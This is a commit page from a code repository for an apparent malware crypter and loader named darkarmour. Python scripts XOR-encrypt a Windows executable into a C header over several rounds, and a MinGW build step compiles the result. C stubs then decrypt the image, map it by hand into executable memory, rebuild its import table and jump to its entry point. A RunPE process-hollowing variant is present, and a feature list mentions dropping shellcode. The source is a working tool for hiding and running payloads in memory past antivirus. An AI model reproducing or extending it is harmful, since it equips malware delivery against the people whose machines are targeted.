Commit 225b4f29 authored by batman's avatar batman

version 0.3

parent 0480f238
File added
File added
#define key0 0x4f
#define key1 0x58
#define key2 0x31
#define key3 0x1e
#define key4 0x4e
VOID FixImageIAT(PIMAGE_DOS_HEADER dos_header, PIMAGE_NT_HEADERS nt_header);
LPVOID MapImageToMemory(LPVOID base_addr);
This diff is collapsed.
This diff is collapsed.
import string
import random
def gen_rand_filename():
name = ""
for i in range(1, 10):
name += random.choice(list(string.ascii_uppercase + string.ascii_lowercase))
return name
def get_size(filename):
with open(filename, "rb") as file:
length = len(file.read())
return length
def clean_hex_output(hex_bytes):
raw_crypt_bytes = b""
for byte in hex_bytes.split():
byte = byte.replace("0x", '')
byte = byte.replace(",", '')
if len(byte) == 1:
byte = f"0{byte}"
try:
raw_crypt_bytes += bytes.fromhex(byte).encode('utf-8')
except AttributeError:
raw_crypt_bytes += bytes.fromhex(byte)
return raw_crypt_bytes
def prepare_pe_image(bytes_len, hex_bytes):
pe_image = f"#define array_len {bytes_len}\n\n"
pe_image += "unsigned long long image_crypt[] = {\n"
pe_image += hex_bytes
pe_image += "\n};"
return pe_image
def write_pe_image(pe_image):
with open("build/pe_image.h", "w") as file:
file.write(pe_image)
def write_header_file(keys_used, jmp=False, runpe=False):
headerfile = ""
with open("build/main.h", "w") as file:
for key in keys_used:
headerfile += f"#define key{key} {hex(keys_used[key])}\n"
if jmp is True:
headerfile += "\nVOID FixImageIAT(PIMAGE_DOS_HEADER dos_header, PIMAGE_NT_HEADERS nt_header);\n"
headerfile += "LPVOID MapImageToMemory(LPVOID base_addr);\n"
if runpe is True:
headerfile += "void RunFromMemory(char* pImage, char* pPath);\n"
file.write(headerfile)
def write_decrypt(path, loops, enc_type="xor"):
first_run = False
to_write = ""
if enc_type == "xor":
while loops != 0:
loops -= 1
if first_run is False:
first_run = True
first_decrypt = """
for (i = 0; i < array_len; i++) {
decrypted_bytes[i] = key%s ^ image_crypt[i];
image_crypt[i] = '\\0';
}
""" % loops
to_write += first_decrypt
else:
decrypt = """
for (i = 0; i < array_len; i++) {
decrypted_bytes[i] = key%s ^ decrypted_bytes[i];
}\n
""" % loops
to_write += decrypt
with open(path, "r") as file:
data = file.readlines()
file.close()
data_backup = data
safe = ''.join(data_backup)
data.insert(127, to_write)
outdata = ''.join(data)
with open(path, "w") as file:
file.write(outdata)
file.close()
return safe
def clean_up(path, clean):
with open(path, "w") as file:
file.write(clean)
file.close()
return
def show_banner(version):
banner = """\033[1;39m
_,.
,` -.)
( _/-\\-._
/,|`--._,-^| \033[1;31m,¡\033[00m
\\_| |`-._/|| / \033[1;31m/\033[00m
| `-, / | / \033[1;31m/\033[00m
| || | / \033[1;31m/\033[00m ______ _ ___
`r-._||/ __ / \033[1;31m/\033[00m | _ \\ | | / _ \\
__,-<_ )`-/ `./ \033[1;31m/\033[00m | | | |__ _ _ __| | _/ /_\\ \\_ __ _ __ ___ ___ _ _ _ __
' \\ `---' \\ / \033[1;31m/\033[00m | | | / _` | '__| |/ / _ | '__| '_ ` _ \\ / _ \\| | | | '__|
| |./ \033[1;31m/\033[00m | |/ / (_| | | | <| | | | | | | | | | | (_) | |_| | |
/ / \033[1;31m/\033[00m |___/ \\__,_|_| |_|\\_\\_| |_/_| |_| |_| |_|\\___/ \\__,_|_|
\\_/' \\ | / \033[1;31m/\033[00m
| | _,^-'/ \033[1;31m/\033[00m
| , `` (\\ / /_ By Dylan Halls | Version %s
\\,.->._ \\X-=/^
( / `-._//^`
`Y-.____(__}
| {__)
()
\033[00m"""
print(banner % version)
"""
Compile the stuffz
"""
import os
class Binary(object):
def __init__(self):
super(Binary, self).__init__()
def compile(self, path, outfile):
os.system(f"x86_64-w64-mingw32-gcc {path} -o {outfile} -static")
return
This diff is collapsed.
"""
The aim with these classes is not to provide 100% cryptologically
secure encryption but to provide obsification through encryption.
"""
import random
class XOR(object):
def __init__(self):
super(XOR, self).__init__()
self.gen_key()
def gen_key(self):
self.key = random.randint(10, 100)
def crypt_file(self, crypt, key, infile=None, data=None, data_length=None):
bytes = ""
if (infile != None) and (data == None):
with open(infile, "rb") as file:
data = file.read()
data_len = len(data)
else:
data_len = data_length
iter = 0
for num, byte in enumerate(data):
byte = hex(byte)
if crypt:
byte = hex(int(byte, 16) ^ key)
else:
if len(str(byte)) == 3:
byte = str(byte).replace("0x", '')
byte = f"0x0{byte}"
iter += 1
if num == data_len - 1:
bytes += f"{str(byte)}"
return bytes, data_len, key
if iter == 16:
bytes += f"{str(byte)},\n"
iter = 0
continue
bytes += f"{str(byte)}, "
#define key_one 0x24
#define key_two 0x1a
#define null_key 0x2f
void RunFromMemory(char* pImage, char* pPath);
\ No newline at end of file
This source diff could not be displayed because it is too large. You can view the blob instead.
go-shellcode @ 4039ceba
Subproject commit 4039cebaeed7ee6b31cc8e849c3c921450758e8b
#include <windows.h>
#include <stdio.h>
#include "../../build/main.h"
#include "../../build/pe_image.h"
VOID FixImageIAT( PIMAGE_DOS_HEADER dos_header, PIMAGE_NT_HEADERS nt_header)
{
PIMAGE_THUNK_DATA thunk;
PIMAGE_THUNK_DATA fixup;
DWORD iat_rva;
SIZE_T iat_size;
HMODULE import_base;
PIMAGE_IMPORT_DESCRIPTOR import_table = (PIMAGE_IMPORT_DESCRIPTOR)(nt_header->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress + (UINT_PTR)dos_header);
DWORD iat_loc = (nt_header->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IAT].VirtualAddress) ? IMAGE_DIRECTORY_ENTRY_IAT : IMAGE_DIRECTORY_ENTRY_IMPORT;
iat_rva = nt_header->OptionalHeader.DataDirectory[iat_loc].VirtualAddress;
iat_size = nt_header->OptionalHeader.DataDirectory[iat_loc].Size;
LPVOID iat = (LPVOID)(iat_rva + (UINT_PTR)dos_header);
DWORD op;
VirtualProtect(iat, iat_size, PAGE_READWRITE, &op);
while (import_table->Name) {
import_base = LoadLibraryA((LPCSTR)(import_table->Name + (UINT_PTR)dos_header));
fixup = (PIMAGE_THUNK_DATA)(import_table->FirstThunk + (UINT_PTR)dos_header);
if (import_table->OriginalFirstThunk) {
thunk = (PIMAGE_THUNK_DATA)(import_table->OriginalFirstThunk + (UINT_PTR)dos_header);
} else {
thunk = (PIMAGE_THUNK_DATA)(import_table->FirstThunk + (UINT_PTR)dos_header);
}
while (thunk->u1.Function) {
PCHAR func_name;
if (thunk->u1.Ordinal & IMAGE_ORDINAL_FLAG64) {
fixup->u1.Function =
(UINT_PTR)GetProcAddress(import_base, (LPCSTR)(thunk->u1.Ordinal & 0xFFFF));
} else {
func_name = (PCHAR)(((PIMAGE_IMPORT_BY_NAME)(thunk->u1.AddressOfData))->Name + (UINT_PTR)dos_header);
fixup->u1.Function = (UINT_PTR)GetProcAddress(import_base, func_name);
}
fixup++;
thunk++;
}
import_table++;
}
return;
}
//if base_addr points to a byte stream in memory then load module from that
//if base_addr is NULL then attempt to map module into memory from resource
//***note if module is memory mapped manually then it has no loaded module handle
//and some modules use the module base as the handle for a call and it will fail
LPVOID MapImageToMemory(LPVOID base_addr) {
LPVOID mem_image_base = NULL;
PIMAGE_DOS_HEADER raw_image_base = (PIMAGE_DOS_HEADER)base_addr;
//only accept from in mem array
if (IMAGE_DOS_SIGNATURE != raw_image_base->e_magic)
return NULL;
PIMAGE_NT_HEADERS nt_header = (PIMAGE_NT_HEADERS)(raw_image_base->e_lfanew + (UINT_PTR)raw_image_base);
if (IMAGE_NT_SIGNATURE != nt_header->Signature)
return NULL;
//only 64bit modules will be loaded
if (IMAGE_FILE_MACHINE_AMD64 != nt_header->FileHeader.Machine)
return NULL;
//Not going to bother with .net
if (nt_header->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR].VirtualAddress)
return NULL;
PIMAGE_SECTION_HEADER section_header =
(PIMAGE_SECTION_HEADER)(raw_image_base->e_lfanew + sizeof(*nt_header) + (UINT_PTR)raw_image_base);
mem_image_base = VirtualAlloc(
(LPVOID)(nt_header->OptionalHeader.ImageBase),
nt_header->OptionalHeader.SizeOfImage ,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
if (NULL == mem_image_base) {
mem_image_base = VirtualAlloc(
NULL,
nt_header->OptionalHeader.SizeOfImage,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
}
if (NULL == mem_image_base)
return NULL;
memcpy(mem_image_base, (LPVOID)raw_image_base, nt_header->OptionalHeader.SizeOfHeaders);
for (int i = 0; i < nt_header->FileHeader.NumberOfSections; i++) {
memcpy(
(LPVOID)(section_header->VirtualAddress + (UINT_PTR)mem_image_base),
(LPVOID)(section_header->PointerToRawData + (UINT_PTR)raw_image_base),
section_header->SizeOfRawData);
section_header++;
}
return mem_image_base;
}
int main() {
int i;
unsigned char decrypted_bytes[array_len+1] = {};
for (i = 0; i < array_len; i++) {
decrypted_bytes[i] = key_two ^ image_crypt[i];
image_crypt[i] = '\0';
}
for (i = 0; i < array_len; i++) {
decrypted_bytes[i] = key_one ^ decrypted_bytes[i];
}
PIMAGE_DOS_HEADER image_base = (PIMAGE_DOS_HEADER)MapImageToMemory((LPVOID)decrypted_bytes);
if (!image_base) {
printf("%s\n", "no base addr");
}
PIMAGE_NT_HEADERS nt_header = (PIMAGE_NT_HEADERS)(image_base->e_lfanew + (UINT_PTR)image_base);
HANDLE actctx = NULL;
UINT_PTR cookie = 0;
BOOL changed_ctx = FALSE;
FixImageIAT(image_base, nt_header);
LPVOID oep = (LPVOID)(nt_header->OptionalHeader.AddressOfEntryPoint + (UINT_PTR)image_base);
printf("[+] jumping to %p (%x)\n", &oep, &oep);
((void(*)())(oep))();
//__asm (
// "jmp %rip"
//);
if (changed_ctx) {
DeactivateActCtx(0, cookie);
ReleaseActCtx(actctx);
}
return 0;
}
/*
#############################################################################
## IMPORTANT ##
## ##
## Elements of this file are automatically generated ##
## by editing this file you can cause this element of ##
## darkarmour to break... dont do that. ##
## ##
#############################################################################
*/
#include <windows.h>
#include <stdio.h>
#include "../../build/main.h"
#include "../../build/pe_image.h"
VOID FixImageIAT( PIMAGE_DOS_HEADER dos_header, PIMAGE_NT_HEADERS nt_header)
{
PIMAGE_THUNK_DATA thunk;
PIMAGE_THUNK_DATA fixup;
DWORD iat_rva;
SIZE_T iat_size;
HMODULE import_base;
PIMAGE_IMPORT_DESCRIPTOR import_table = (PIMAGE_IMPORT_DESCRIPTOR)(nt_header->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress + (UINT_PTR)dos_header);
DWORD iat_loc = (nt_header->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IAT].VirtualAddress) ? IMAGE_DIRECTORY_ENTRY_IAT : IMAGE_DIRECTORY_ENTRY_IMPORT;
iat_rva = nt_header->OptionalHeader.DataDirectory[iat_loc].VirtualAddress;
iat_size = nt_header->OptionalHeader.DataDirectory[iat_loc].Size;
LPVOID iat = (LPVOID)(iat_rva + (UINT_PTR)dos_header);
DWORD op;
VirtualProtect(iat, iat_size, PAGE_READWRITE, &op);
while (import_table->Name) {
import_base = LoadLibraryA((LPCSTR)(import_table->Name + (UINT_PTR)dos_header));
fixup = (PIMAGE_THUNK_DATA)(import_table->FirstThunk + (UINT_PTR)dos_header);
if (import_table->OriginalFirstThunk) {
thunk = (PIMAGE_THUNK_DATA)(import_table->OriginalFirstThunk + (UINT_PTR)dos_header);
} else {
thunk = (PIMAGE_THUNK_DATA)(import_table->FirstThunk + (UINT_PTR)dos_header);
}
while (thunk->u1.Function) {
PCHAR func_name;
if (thunk->u1.Ordinal & IMAGE_ORDINAL_FLAG64) {
fixup->u1.Function =
(UINT_PTR)GetProcAddress(import_base, (LPCSTR)(thunk->u1.Ordinal & 0xFFFF));
} else {
func_name = (PCHAR)(((PIMAGE_IMPORT_BY_NAME)(thunk->u1.AddressOfData))->Name + (UINT_PTR)dos_header);
fixup->u1.Function = (UINT_PTR)GetProcAddress(import_base, func_name);
}
fixup++;
thunk++;
}
import_table++;
}
return;
}
//if base_addr points to a byte stream in memory then load module from that
//if base_addr is NULL then attempt to map module into memory from resource
//***note if module is memory mapped manually then it has no loaded module handle
//and some modules use the module base as the handle for a call and it will fail
LPVOID MapImageToMemory(LPVOID base_addr) {
LPVOID mem_image_base = NULL;
PIMAGE_DOS_HEADER raw_image_base = (PIMAGE_DOS_HEADER)base_addr;
//only accept from in mem array
if (IMAGE_DOS_SIGNATURE != raw_image_base->e_magic)
return NULL;
PIMAGE_NT_HEADERS nt_header = (PIMAGE_NT_HEADERS)(raw_image_base->e_lfanew + (UINT_PTR)raw_image_base);
if (IMAGE_NT_SIGNATURE != nt_header->Signature)
return NULL;
//only 64bit modules will be loaded
if (IMAGE_FILE_MACHINE_AMD64 != nt_header->FileHeader.Machine)
return NULL;
//Not going to bother with .net
if (nt_header->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR].VirtualAddress)
return NULL;
PIMAGE_SECTION_HEADER section_header =
(PIMAGE_SECTION_HEADER)(raw_image_base->e_lfanew + sizeof(*nt_header) + (UINT_PTR)raw_image_base);
mem_image_base = VirtualAlloc(
(LPVOID)(nt_header->OptionalHeader.ImageBase),
nt_header->OptionalHeader.SizeOfImage ,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
if (NULL == mem_image_base) {
mem_image_base = VirtualAlloc(
NULL,
nt_header->OptionalHeader.SizeOfImage,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
}
if (NULL == mem_image_base)
return NULL;
memcpy(mem_image_base, (LPVOID)raw_image_base, nt_header->OptionalHeader.SizeOfHeaders);
for (int i = 0; i < nt_header->FileHeader.NumberOfSections; i++) {
memcpy(
(LPVOID)(section_header->VirtualAddress + (UINT_PTR)mem_image_base),
(LPVOID)(section_header->PointerToRawData + (UINT_PTR)raw_image_base),
section_header->SizeOfRawData);
section_header++;
}
return mem_image_base;
}
int main() {
int i;
unsigned char decrypted_bytes[array_len+1] = {};
PIMAGE_DOS_HEADER image_base = (PIMAGE_DOS_HEADER)MapImageToMemory((LPVOID)decrypted_bytes);
if (!image_base) {
printf("%s\n", "no base addr");
}
PIMAGE_NT_HEADERS nt_header = (PIMAGE_NT_HEADERS)(image_base->e_lfanew + (UINT_PTR)image_base);
HANDLE actctx = NULL;
UINT_PTR cookie = 0;
BOOL changed_ctx = FALSE;
FixImageIAT(image_base, nt_header);
LPVOID oep = (LPVOID)(nt_header->OptionalHeader.AddressOfEntryPoint + (UINT_PTR)image_base);
printf("[+] jumping to %p (%x)\n", &oep, &oep);
((void(*)())(oep))();
//__asm (
// "jmp %rip"
//);
if (changed_ctx) {
DeactivateActCtx(0, cookie);
ReleaseActCtx(actctx);
}
return 0;
}
This diff is collapsed.
......@@ -19,7 +19,9 @@ int main(){
}
}
GetModuleFileNameA(0, exec_file_path, 1024); // Path to current executable.
RunFromMemory((char*)decrypted_bytes, exec_file_path);
//GetModuleFileNameA(0, exec_file_path, 1024); // Path to current executable.
system("pause");
RunFromMemory((char*)decrypted_bytes, (char*)"c:\\windows\\system32\\calc.exe");
//RunFromMemory((char*)decrypted_bytes, exec_file_path;
return 0;
}
#define key_one 0x29
#define key_two 0x22
#define null_key 0x2f
VOID FixImageIAT(PIMAGE_DOS_HEADER dos_header, PIMAGE_NT_HEADERS nt_header);LPVOID MapImageToMemory(LPVOID base_addr);
\ No newline at end of file
This diff is collapsed.
......@@ -20,5 +20,6 @@ int main(){
GetModuleFileNameA(0, exec_file_path, 1024);
RunFromMemory((char*)decrypted_bytes, exec_file_path);
//RunFromMemory((char*)decrypted_bytes, (char*)"c:\\windows\\system32\\calc.exe");
return 0;
}
This diff is collapsed.
features
32 + 64 pe support (runpe 32 jmp 64)
drop shellcode
easy install
ascii banner
optional go shellcode dropper
diffrent types of encryption (aes, rsa)
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment